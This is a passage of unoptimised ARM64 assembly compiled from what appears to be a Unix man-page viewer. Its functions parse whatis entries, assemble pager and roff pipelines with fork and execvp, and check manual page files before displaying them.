Depth=2 ldur w8, [x29, #-60] ldr x9, [sp, #56] ldrb w9, [x9] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB1_52 b LBB1_51 LBB1_51: ; in Loop: Header=BB1_34 Depth=1 b LBB1_53 LBB1_52: ; in Loop: Header=BB1_44 Depth=2 ldr x8, [sp, #56] add x8, x8, #1 str x8, [sp, #56] b LBB1_44 LBB1_53: ; in Loop: Header=BB1_34 Depth=1 b LBB1_54 LBB1_54: ; in Loop: Header=BB1_34 Depth=1 ldur w8, [x29, #-60] ldr x9, [sp, #56] ldrb w9, [x9] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB1_34 b LBB1_55 LBB1_55: ldr x8, [sp, #56] ldrb w8, [x8] ldur w9, [x29, #-60] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB1_57 b LBB1_56 LBB1_56: stur wzr, [x29, #-4] b LBB1_103 LBB1_57: b LBB1_58 LBB1_58: ; =>This Inner Loop Header: Depth=1 ldur x0, [x29, #-16] bl _fgetc stur w0, [x29, #-60] subs w8, w0, #32 cset w8, eq mov w9, #1 str w9, [sp, #20] ; 4-byte Folded Spill tbnz w8, #0, LBB1_60 b LBB1_59 LBB1_59: ; in Loop: Header=BB1_58 Depth=1 ldur w8, [x29, #-60] subs w8, w8, #9 cset w8, eq str w8, [sp, #20] ; 4-byte Folded Spill b LBB1_60 LBB1_60: ; in Loop: Header=BB1_58 Depth=1 ldr w8, [sp, #20] ; 4-byte Folded Reload tbz w8, #0, LBB1_62 b LBB1_61 LBB1_61: ; in Loop: Header=BB1_58 Depth=1 b LBB1_58 LBB1_62: adrp x8, _searchwindex.page@PAGE add x8, x8, _searchwindex.page@PAGEOFF str x8, [sp, #48] b LBB1_63 LBB1_63: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-60] subs w8, w8, #32 cset w8, eq mov w9, #0 str w9, [sp, #16] ; 4-byte Folded Spill tbnz w8, #0, LBB1_68 b LBB1_64 LBB1_64: ; in Loop: Header=BB1_63 Depth=1 ldur w8, [x29, #-60] subs w8, w8, #9 cset w8, eq mov w9, #0 str w9, [sp, #16] ; 4-byte Folded Spill tbnz w8, #0, LBB1_68 b LBB1_65 LBB1_65: ; in Loop: Header=BB1_63 Depth=1 ldur w8, [x29, #-60] subs w8, w8, #40 cset w8, eq mov w9, #0 str w9, [sp, #16] ; 4-byte Folded Spill tbnz w8, #0, LBB1_68 b LBB1_66 LBB1_66: ; in Loop: Header=BB1_63 Depth=1 ldur w8, [x29, #-60] subs w8, w8, #10 cset w8, eq mov w9, #0 str w9, [sp, #16] ; 4-byte Folded Spill tbnz w8, #0, LBB1_68 b LBB1_67 LBB1_67: ; in Loop: Header=BB1_63 Depth=1 ldur w8, [x29, #-60] adds w8, w8, #1 cset w8, ne str w8, [sp, #16] ; 4-byte Folded Spill b LBB1_68 LBB1_68: ; in Loop: Header=BB1_63 Depth=1 ldr w8, [sp, #16] ; 4-byte Folded Reload tbz w8, #0, LBB1_72 b LBB1_69 LBB1_69: ; in Loop: Header=BB1_63 Depth=1 ldr x9, [sp, #40] ; 8-byte Folded Reload ldr x8, [sp, #48] subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB1_71 b LBB1_70 LBB1_70: ; in Loop: Header=BB1_63 Depth=1 ldur w8, [x29, #-60] ldr x9, [sp, #48] add x10, x9, #1 str x10, [sp, #48] strb w8, [x9] b LBB1_71 LBB1_71: ; in Loop: Header=BB1_63 Depth=1 ldur x0, [x29, #-16] bl _getc stur w0, [x29, #-60] b LBB1_63 LBB1_72: ldr x8, [sp, #48] adrp x9, _searchwindex.page@PAGE add x9, x9, _searchwindex.page@PAGEOFF subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB1_74 b LBB1_73 LBB1_73: stur wzr, [x29, #-4] b LBB1_103 LBB1_74: ldr x8, [sp, #48] strb wzr, [x8] b LBB1_75 LBB1_75: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-60] subs w8, w8, #32 cset w8, eq mov w9, #1 str w9, [sp, #12] ; 4-byte Folded Spill tbnz w8, #0, LBB1_77 b LBB1_76 LBB1_76: ; in Loop: Header=BB1_75 Depth=1 ldur w8, [x29, #-60] subs w8, w8, #9 cset w8, eq str w8, [sp, #12] ; 4-byte Folded Spill b LBB1_77 LBB1_77: ; in Loop: Header=BB1_75 Depth=1 ldr w8, [sp, #12] ; 4-byte Folded Reload tbz w8, #0, LBB1_79 b LBB1_78 LBB1_78: ; in Loop: Header=BB1_75 Depth=1 ldur x0, [x29, #-16] bl _fgetc stur w0, [x29, #-60] b LBB1_75 LBB1_79: ldur w8, [x29, #-60] subs w8, w8, #40 cset w8, eq tbnz w8, #0, LBB1_81 b LBB1_80 LBB1_80: stur wzr, [x29, #-4] b LBB1_103 LBB1_81: adrp x8, _searchwindex.section@PAGE add x8, x8, _searchwindex.section@PAGEOFF str x8, [sp, #48] b LBB1_82 LBB1_82: ; =>This Inner Loop Header: Depth=1 ldur x0, [x29, #-16] bl _fgetc stur w0, [x29, #-60] subs w8, w0, #41 cset w8, eq mov w9, #0 str w9, [sp, #8] ; 4-byte Folded Spill tbnz w8, #0, LBB1_85 b LBB1_83 LBB1_83: ; in Loop: Header=BB1_82 Depth=1 ldur w8, [x29, #-60] subs w8, w8, #10 cset w8, eq mov w9, #0 str w9, [sp, #8] ; 4-byte Folded Spill tbnz w8, #0, LBB1_85 b LBB1_84 LBB1_84: ; in Loop: Header=BB1_82 Depth=1 ldur w8, [x29, #-60] adds w8, w8, #1 cset w8, ne str w8, [sp, #8] ; 4-byte Folded Spill b LBB1_85 LBB1_85: ; in Loop: Header=BB1_82 Depth=1 ldr w8, [sp, #8] ; 4-byte Folded Reload tbz w8, #0, LBB1_92 b LBB1_86 LBB1_86: ; in Loop: Header=BB1_82 Depth=1 ldur w9, [x29, #-60] mov w8, #65 subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_89 b LBB1_87 LBB1_87: ; in Loop: Header=BB1_82 Depth=1 ldur w8, [x29, #-60] subs w8, w8, #90 cset w8, gt tbnz w8, #0, LBB1_89 b LBB1_88 LBB1_88: ; in Loop: Header=BB1_82 Depth=1 ldur w8, [x29, #-60] subs w8, w8, #65 add w8, w8, #97 stur w8, [x29, #-60] b LBB1_89 LBB1_89: ; in Loop: Header=BB1_82 Depth=1 ldr x9, [sp, #32] ; 8-byte Folded Reload ldr x8, [sp, #48] subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB1_91 b LBB1_90 LBB1_90: ; in Loop: Header=BB1_82 Depth=1 ldur w8, [x29, #-60] ldr x9, [sp, #48] add x10, x9, #1 str x10, [sp, #48] strb w8, [x9] b LBB1_91 LBB1_91: ; in Loop: Header=BB1_82 Depth=1 b LBB1_82 LBB1_92: ldr x8, [sp, #48] strb wzr, [x8] ldur w8, [x29, #-60] subs w8, w8, #41 cset w8, ne tbnz w8, #0, LBB1_94 b LBB1_93 LBB1_93: ldr x8, [sp, #48] adrp x9, _searchwindex.section@PAGE add x9, x9, _searchwindex.section@PAGEOFF subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB1_95 b LBB1_94 LBB1_94: stur wzr, [x29, #-4] b LBB1_103 LBB1_95: b LBB1_96 LBB1_96: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-60] adds w8, w8, #1 cset w8, eq mov w9, #0 str w9, [sp, #4] ; 4-byte Folded Spill tbnz w8, #0, LBB1_98 b LBB1_97 LBB1_97: ; in Loop: Header=BB1_96 Depth=1 ldur w8, [x29, #-60] subs w8, w8, #10 cset w8, ne str w8, [sp, #4] ; 4-byte Folded Spill b LBB1_98 LBB1_98: ; in Loop: Header=BB1_96 Depth=1 ldr w8, [sp, #4] ; 4-byte Folded Reload tbz w8, #0, LBB1_100 b LBB1_99 LBB1_99: ; in Loop: Header=BB1_96 Depth=1 ldur x0, [x29, #-16] bl _getc stur w0, [x29, #-60] b LBB1_96 LBB1_100: ldur w8, [x29, #-60] subs w8, w8, #10 cset w8, eq tbnz w8, #0, LBB1_102 b LBB1_101 LBB1_101: stur wzr, [x29, #-4] b LBB1_103 LBB1_102: ldur x9, [x29, #-32] adrp x8, _searchwindex.page@PAGE add x8, x8, _searchwindex.page@PAGEOFF str x8, [x9] ldur x9, [x29, #-40] adrp x8, _searchwindex.section@PAGE add x8, x8, _searchwindex.section@PAGEOFF str x8, [x9] mov w8, #1 stur w8, [x29, #-4] b LBB1_103 LBB1_103: ldur w0, [x29, #-4] ldp x29, x30, [sp, #128] ; 16-byte Folded Reload add sp, sp, #144 ret .cfi_endproc ; -- End function .globl _putinline ; -- Begin function putinline .p2align 2 _putinline: ; @putinline .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #24] adrp x10, _plast@PAGE ldr x8, [x10, _plast@PAGEOFF] mov x9, x8 add x9, x9, #64 str x9, [x10, _plast@PAGEOFF] str x8, [sp, #8] ldr x8, [sp, #24] ldr x9, [sp, #8] add x10, x9, #8 str x10, [sp, #8] str x8, [x9] add x9, sp, #16 add x8, sp, #32 str x8, [x9] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #16] ldr x8, [x9] add x9, x9, #8 str x9, [sp, #16] str x8, [sp] ldr x8, [sp] ldr x10, [sp, #8] add x9, x10, #8 str x9, [sp, #8] mov x9, x8 str x9, [x10] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB2_3 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 b LBB2_1 LBB2_3: add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _execute ; -- Begin function execute .p2align 2 _execute: ; @execute .cfi_startproc ; %bb.0: sub sp, sp, #240 .cfi_def_cfa_offset 240 stp x29, x30, [sp, #224] ; 16-byte Folded Spill add x29, sp, #224 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _pipeline@GOTPAGE ldr x8, [x8, _pipeline@GOTPAGEOFF] str x8, [sp, #96] ; 8-byte Folded Spill adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] str x8, [sp, #104] ; 8-byte Folded Spill adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur w0, [x29, #-28] stur x1, [x29, #-40] adrp x8, _tty@GOTPAGE ldr x8, [x8, _tty@GOTPAGEOFF] ldr w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_2 b LBB3_1 LBB3_1: adrp x8, _pager@GOTPAGE ldr x8, [x8, _pager@GOTPAGEOFF] ldr x0, [x8] mov x8, sp ; kill: def $x9 killed $xzr str xzr, [x8] bl _putinline b LBB3_2 LBB3_2: ldr x9, [sp, #96] ; 8-byte Folded Reload adrp x8, _plast@PAGE ldr x8, [x8, _plast@PAGEOFF] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB3_4 b LBB3_3 LBB3_3: mov x8, sp ; kill: def $x9 killed $xzr str xzr, [x8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _putinline b LBB3_4 LBB3_4: ldr x8, [sp, #96] ; 8-byte Folded Reload stur x8, [x29, #-56] b LBB3_5 LBB3_5: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-56] ldr x8, [x8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB3_7 b LBB3_6 LBB3_6: ; in Loop: Header=BB3_5 Depth=1 ldur x8, [x29, #-56] add x8, x8, #8 stur x8, [x29, #-56] b LBB3_5 LBB3_7: ldr x8, [sp, #96] ; 8-byte Folded Reload ldur x9, [x29, #-40] ldur x10, [x29, #-56] add x11, x10, #8 stur x11, [x29, #-56] str x9, [x10] ldur x9, [x29, #-56] ; kill: def $x10 killed $xzr str xzr, [x9] stur wzr, [x29, #-68] stur x8, [x29, #-48] b LBB3_8 LBB3_8: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-48] adrp x9, _plast@PAGE ldr x9, [x9, _plast@PAGEOFF] subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB3_33 b LBB3_9 LBB3_9: ; in Loop: Header=BB3_8 Depth=1 ldur x8, [x29, #-48] stur x8, [x29, #-56] ldur x8, [x29, #-48] add x8, x8, #64 adrp x9, _plast@PAGE ldr x9, [x9, _plast@PAGEOFF] subs x8, x8, x9 cset w8, eq and w8, w8, #0x1 stur w8, [x29, #-84] sub x0, x29, #24 bl _pipe subs w8, w0, #0 cset w8, lt tbnz w8, #0, LBB3_12 b LBB3_10 LBB3_10: ; in Loop: Header=BB3_8 Depth=1 ldur w8, [x29, #-84] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB3_13 b LBB3_11 LBB3_11: ; in Loop: Header=BB3_8 Depth=1 sub x0, x29, #16 bl _pipe subs w8, w0, #0 cset w8, ge tbnz w8, #0, LBB3_13 b LBB3_12 LBB3_12: ldr x8, [sp, #104] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #88] ; 8-byte Folded Spill bl ___error ldr w0, [x0] bl _strerror mov x8, x0 ldr x0, [sp, #88] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB3_13: ; in Loop: Header=BB3_8 Depth=1 ldur w8, [x29, #-20] str w8, [sp, #84] ; 4-byte Folded Spill ldur w0, [x29, #-20] mov w1, #1 bl _fcntl mov x8, x0 ldr w0, [sp, #84] ; 4-byte Folded Reload orr w10, w8, #0x1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] mov w1, #2 bl _fcntl bl _fork stur w0, [x29, #-72] subs w8, w0, #0 cset w8, ge tbnz w8, #0, LBB3_15 b LBB3_14 LBB3_14: ldr x8, [sp, #104] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #72] ; 8-byte Folded Spill bl ___error ldr w0, [x0] bl _strerror mov x8, x0 ldr x0, [sp, #72] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB3_15: ; in Loop: Header=BB3_8 Depth=1 ldur w8, [x29, #-72] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB3_27 b LBB3_16 LBB3_16: ldur w8, [x29, #-28] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_20 b LBB3_17 LBB3_17: adrp x8, _manpath@GOTPAGE ldr x8, [x8, _manpath@GOTPAGEOFF] ldr x0, [x8] bl _strlen add x8, x0, #8 add x8, x8, #1 lsr x0, x8, #0 bl _malloc stur x0, [x29, #-64] ldur x8, [x29, #-64] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB3_19 b LBB3_18 LBB3_18: ldur x0, [x29, #-64] adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF mov x2, #-1 str x2, [sp, #64] ; 8-byte Folded Spill bl ___strcpy_chk ldr x2, [sp, #64] ; 8-byte Folded Reload ldur x0, [x29, #-64] adrp x8, _manpath@GOTPAGE ldr x8, [x8, _manpath@GOTPAGEOFF] ldr x1, [x8] bl ___strcat_chk ldur x0, [x29, #-64] bl _putenv b LBB3_19 LBB3_19: b LBB3_20 LBB3_20: ldur w8, [x29, #-68] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_22 b LBB3_21 LBB3_21: ldur w0, [x29, #-68] mov w1, #0 bl _dup2 ldur w0, [x29, #-68] bl _close b LBB3_22 LBB3_22: ldur w8, [x29, #-84] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB3_26 b LBB3_23 LBB3_23: ldur w0, [x29, #-16] bl _close ldur w8, [x29, #-12] subs w8, w8, #1 cset w8, eq tbnz w8, #0, LBB3_25 b LBB3_24 LBB3_24: ldur w0, [x29, #-12] mov w1, #1 bl _dup2 ldur w0, [x29, #-12] bl _close b LBB3_25 LBB3_25: b LBB3_26 LBB3_26: ldur w0, [x29, #-24] bl _close ldur x8, [x29, #-56] ldr x0, [x8] ldur x1, [x29, #-56] bl _execvp ldur w8, [x29, #-20] str w8, [sp, #60] ; 4-byte Folded Spill bl ___error mov x1, x0 ldr w0, [sp, #60] ; 4-byte Folded Reload mov x2, #4 bl _write mov w0, #1 bl __exit LBB3_27: ; in Loop: Header=BB3_8 Depth=1 ldur w0, [x29, #-20] bl _close ldur w8, [x29, #-24] str w8, [sp, #56] ; 4-byte Folded Spill bl ___error mov x1, x0 ldr w0, [sp, #56] ; 4-byte Folded Reload mov x2, #4 bl _read subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB3_29 b LBB3_28 LBB3_28: ldr x8, [sp, #104] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #48] ; 8-byte Folded Spill ldur x8, [x29, #-56] ldr x8, [x8] str x8, [sp, #40] ; 8-byte Folded Spill bl ___error ldr w0, [x0] bl _strerror ldr x10, [sp, #40] ; 8-byte Folded Reload mov x8, x0 ldr x0, [sp, #48] ; 8-byte Folded Reload mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB3_29: ; in Loop: Header=BB3_8 Depth=1 ldur w0, [x29, #-24] bl _close ldur w8, [x29, #-84] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB3_31 b LBB3_30 LBB3_30: ; in Loop: Header=BB3_8 Depth=1 ldur w0, [x29, #-12] bl _close ldur w8, [x29, #-16] stur w8, [x29, #-68] b LBB3_31 LBB3_31: ; in Loop: Header=BB3_8 Depth=1 stur wzr, [x29, #-28] b LBB3_32 LBB3_32: ; in Loop: Header=BB3_8 Depth=1 ldur x8, [x29, #-48] add x8, x8, #64 stur x8, [x29, #-48] b LBB3_8 LBB3_33: mov w0, #2 mov x1, #1 str x1, [sp, #32] ; 8-byte Folded Spill bl _signal ldr x1, [sp, #32] ; 8-byte Folded Reload stur x0, [x29, #-96] mov w0, #3 bl _signal ldr x1, [sp, #32] ; 8-byte Folded Reload stur x0, [x29, #-104] mov w0, #15 bl _signal str x0, [sp, #112] b LBB3_34 LBB3_34: ; =>This Inner Loop Header: Depth=1 sub x0, x29, #80 bl _wait stur w0, [x29, #-76] ldur w8, [x29, #-72] subs w8, w0, w8 cset w8, eq tbnz w8, #0, LBB3_38 b LBB3_35 LBB3_35: ; in Loop: Header=BB3_34 Depth=1 ldur w8, [x29, #-76] subs w8, w8, #0 cset w8, ge tbnz w8, #0, LBB3_37 b LBB3_36 LBB3_36: ldr x8, [sp, #104] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #24] ; 8-byte Folded Spill bl ___error ldr w0, [x0] bl _strerror mov x8, x0 ldr x0, [sp, #24] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB3_37: ; in Loop: Header=BB3_34 Depth=1 b LBB3_34 LBB3_38: ldur x1, [x29, #-96] mov w0, #2 bl _signal ldur x1, [x29, #-104] mov w0, #3 bl _signal ldr x1, [sp, #112] mov w0, #15 bl _signal ldur w8, [x29, #-80] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_40 b LBB3_39 LBB3_39: mov w0, #1 bl _exit LBB3_40: ldr x8, [sp, #96] ; 8-byte Folded Reload adrp x9, _plast@PAGE str x8, [x9, _plast@PAGEOFF] ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB3_42 b LBB3_41 LBB3_41: bl ___stack_chk_fail LBB3_42: ldp x29, x30, [sp, #224] ; 16-byte Folded Reload add sp, sp, #240 ret .cfi_endproc ; -- End function .globl _keyword ; -- Begin function keyword .p2align 2 _keyword: ; @keyword .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] adrp x8, _apropos@PAGE ldr w8, [x8, _apropos@PAGEOFF] subs w8, w8, #0 cset w8, ne and w10, w8, #0x1 adrp x9, l_.str.9@PAGE add x9, x9, l_.str.9@PAGEOFF adrp x8, l_.str.8@PAGE add x8, x8, l_.str.8@PAGEOFF ands w10, w10, #0x1 csel x0, x8, x9, ne adrp x8, _all@PAGE ldr w8, [x8, _all@PAGEOFF] subs w8, w8, #0 cset w8, ne and w10, w8, #0x1 mov x9, #0 adrp x8, l_.str.10@PAGE add x8, x8, l_.str.10@PAGEOFF ands w10, w10, #0x1 csel x9, x8, x9, ne mov x8, sp str x9, [x8] str xzr, [x8, #8] bl _putinline adrp x8, _tty@GOTPAGE ldr x8, [x8, _tty@GOTPAGEOFF] ldr w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_2 b LBB4_1 LBB4_1: ldur x8, [x29, #-8] mov x9, sp str x8, [x9] adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _printf adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] ldr x0, [x8] bl _fflush b LBB4_2 LBB4_2: ldur x1, [x29, #-8] mov w0, #1 bl _execute ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _showpage ; -- Begin function showpage .p2align 2 _showpage: ; @showpage .cfi_startproc ; %bb.0: sub sp, sp, #272 .cfi_def_cfa_offset 272 stp x28, x27, [sp, #240] ; 16-byte Folded Spill stp x29, x30, [sp, #256] ; 16-byte Folded Spill add x29, sp, #256 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 stur x0, [x29, #-32] stur w1, [x29, #-36] stur x2, [x29, #-48] ldur x0, [x29, #-32] add x1, sp, #64 bl _stat subs w8, w0, #0 cset w8, ge tbnz w8, #0, LBB5_2 b LBB5_1 LBB5_1: stur wzr, [x29, #-20] b LBB5_44 LBB5_2: ldrh w8, [sp, #68] and w8, w8, #0xf000 subs w8, w8, #8, lsl #12 ; =32768 cset w8, eq tbnz w8, #0, LBB5_4 b LBB5_3 LBB5_3: stur wzr, [x29, #-20] b LBB5_44 LBB5_4: ldrh w8, [sp, #68] mov w9, #73 ands w8, w8, w9 cset w8, eq tbnz w8, #0, LBB5_7 b LBB5_5 LBB5_5: ldur x8, [x29, #-32] ldrsb w8, [x8] subs w8, w8, #47 cset w8, eq tbnz w8, #0, LBB5_7 b LBB5_6 LBB5_6: stur wzr, [x29, #-20] b LBB5_44 LBB5_7: adrp x8, _quiet@PAGE ldr w8, [x8, _quiet@PAGEOFF] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB5_9 b LBB5_8 LBB5_8: adrp x9, _shown@GOTPAGE ldr x9, [x9, _shown@GOTPAGEOFF] mov w8, #1 str w8, [x9] stur w8, [x29, #-20] b LBB5_44 LBB5_9: ldur w8, [x29, #-36] subs w8, w8, #1 cset w8, eq tbnz w8, #0, LBB5_12 b LBB5_10 LBB5_10: ldur w8, [x29, #-36] subs w8, w8, #3 cset w8, eq tbnz w8, #0, LBB5_12 b LBB5_11 LBB5_11: ldur w8, [x29, #-36] subs w8, w8, #5 cset w8, ne tbnz w8, #0, LBB5_13 b LBB5_12 LBB5_12: mov x8, sp ; kill: def $x9 killed $xzr str xzr, [x8] adrp x0, l_.str.12@PAGE add x0, x0, l_.str.12@PAGEOFF bl _putinline b LBB5_13 LBB5_13: ldur w8, [x29, #-36] subs w8, w8, #4 cset w8, eq tbnz w8, #0, LBB5_15 b LBB5_14 LBB5_14: ldur w8, [x29, #-36] subs w8, w8, #5 cset w8, ne tbnz w8, #0, LBB5_16 b LBB5_15 LBB5_15: mov x8, sp ; kill: def $x9 killed $xzr str xzr, [x8] adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _putinline mov x8, sp str xzr, [x8] adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF bl _putinline mov x8, sp str xzr, [x8] adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF bl _putinline b LBB5_16 LBB5_16: ldur w8, [x29, #-36] subs w8, w8, #2 cset w8, ne tbnz w8, #0, LBB5_34 b LBB5_17 LBB5_17: adrp x8, _TBL_MAGIC@PAGE add x8, x8, _TBL_MAGIC@PAGEOFF str x8, [sp, #40] ldur x0, [x29, #-32] adrp x1, l_.str.16@PAGE add x1, x1, l_.str.16@PAGEOFF bl _fopen mov x8, x0 str x8, [sp, #56] subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB5_19 b LBB5_18 LBB5_18: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #32] ; 8-byte Folded Spill ldur x8, [x29, #-32] str x8, [sp, #24] ; 8-byte Folded Spill bl ___error ldr w0, [x0] bl _strerror ldr x10, [sp, #24] ; 8-byte Folded Reload mov x8, x0 ldr x0, [sp, #32] ; 8-byte Folded Reload mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB5_19: ldr x0, [sp, #56] bl _fgetc str w0, [sp, #52] b LBB5_20 LBB5_20: ; =>This Loop Header: Depth=1 ; Child Loop BB5_28 Depth 2 ldr w8, [sp, #52] ldr x9, [sp, #40] ldrsb w9, [x9] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB5_23 b LBB5_21 LBB5_21: ; in Loop: Header=BB5_20 Depth=1 ldr w8, [sp, #52] subs w8, w8, #39 cset w8, ne tbnz w8, #0, LBB5_26 b LBB5_22 LBB5_22: ; in Loop: Header=BB5_20 Depth=1 ldr x8, [sp, #40] ldrsb w8, [x8] subs w8, w8, #46 cset w8, ne tbnz w8, #0, LBB5_26 b LBB5_23 LBB5_23: ; in Loop: Header=BB5_20 Depth=1 ldr x8, [sp, #40] add x9, x8, #1 str x9, [sp, #40] ldrsb w8, [x8, #1] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB5_25 b LBB5_24 LBB5_24: mov x8, sp ; kill: def $x9 killed $xzr str xzr, [x8] adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF bl _putinline b LBB5_33 LBB5_25: ; in Loop: Header=BB5_20 Depth=1 b LBB5_27 LBB5_26: b LBB5_33 LBB5_27: ; in Loop: Header=BB5_20 Depth=1 b LBB5_28 LBB5_28: ; Parent Loop BB5_20 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x0, [sp, #56] bl _fgetc str w0, [sp, #52] subs w8, w0, #32 cset w8, eq mov w9, #1 str w9, [sp, #20] ; 4-byte Folded Spill tbnz w8, #0, LBB5_30 b LBB5_29 LBB5_29: ; in Loop: Header=BB5_28 Depth=2 ldr w8, [sp, #52] subs w8, w8, #9 cset w8, eq str w8, [sp, #20] ; 4-byte Folded Spill b LBB5_30 LBB5_30: ; in Loop: Header=BB5_28 Depth=2 ldr w8, [sp, #20] ; 4-byte Folded Reload tbz w8, #0, LBB5_32 b LBB5_31 LBB5_31: ; in Loop: Header=BB5_28 Depth=2 b LBB5_28 LBB5_32: ; in Loop: Header=BB5_20 Depth=1 b LBB5_20 LBB5_33: ldr x0, [sp, #56] bl _fclose b LBB5_34 LBB5_34: ldur w8, [x29, #-36] subs w8, w8, #2 cset w8, eq tbnz w8, #0, LBB5_38 b LBB5_35 LBB5_35: ldur w8, [x29, #-36] subs w8, w8, #3 cset w8, eq tbnz w8, #0, LBB5_38 b LBB5_36 LBB5_36: ldur w8, [x29, #-36] subs w8, w8, #4 cset w8, eq tbnz w8, #0, LBB5_38 b LBB5_37 LBB5_37: ldur w8, [x29, #-36] subs w8, w8, #5 cset w8, ne tbnz w8, #0, LBB5_39 b LBB5_38 LBB5_38: adrp x8, _rofftype@PAGE ldr w8, [x8, _rofftype@PAGEOFF] mov x9, x8 adrp x8, _roff@PAGE add x8, x8, _roff@PAGEOFF ldr x0, [x8, x9, lsl #3] ldur x9, [x29, #-48] mov x8, sp str x9, [x8] ; kill: def $x9 killed $xzr str xzr, [x8, #8] bl _putinline b LBB5_39 LBB5_39: adrp x8, _tty@GOTPAGE ldr x8, [x8, _tty@GOTPAGEOFF] ldr w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB5_43 b LBB5_40 LBB5_40: ldur w8, [x29, #-36] subs w8, w8, #0 cset w8, eq mov w9, #1 str w9, [sp, #16] ; 4-byte Folded Spill tbnz w8, #0, LBB5_42 b LBB5_41 LBB5_41: ldur w8, [x29, #-36] subs w8, w8, #1 cset w8, eq str w8, [sp, #16] ; 4-byte Folded Spill b LBB5_42 LBB5_42: ldr w8, [sp, #16] ; 4-byte Folded Reload and w10, w8, #0x1 adrp x9, l_.str.19@PAGE add x9, x9, l_.str.19@PAGEOFF adrp x8, l_.str.18@PAGE add x8, x8, l_.str.18@PAGEOFF ands w10, w10, #0x1 csel x10, x8, x9, ne ldur x8, [x29, #-32] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.17@PAGE add x0, x0, l_.str.17@PAGEOFF bl _printf adrp x8, ___stdoutp@GOTPAGE 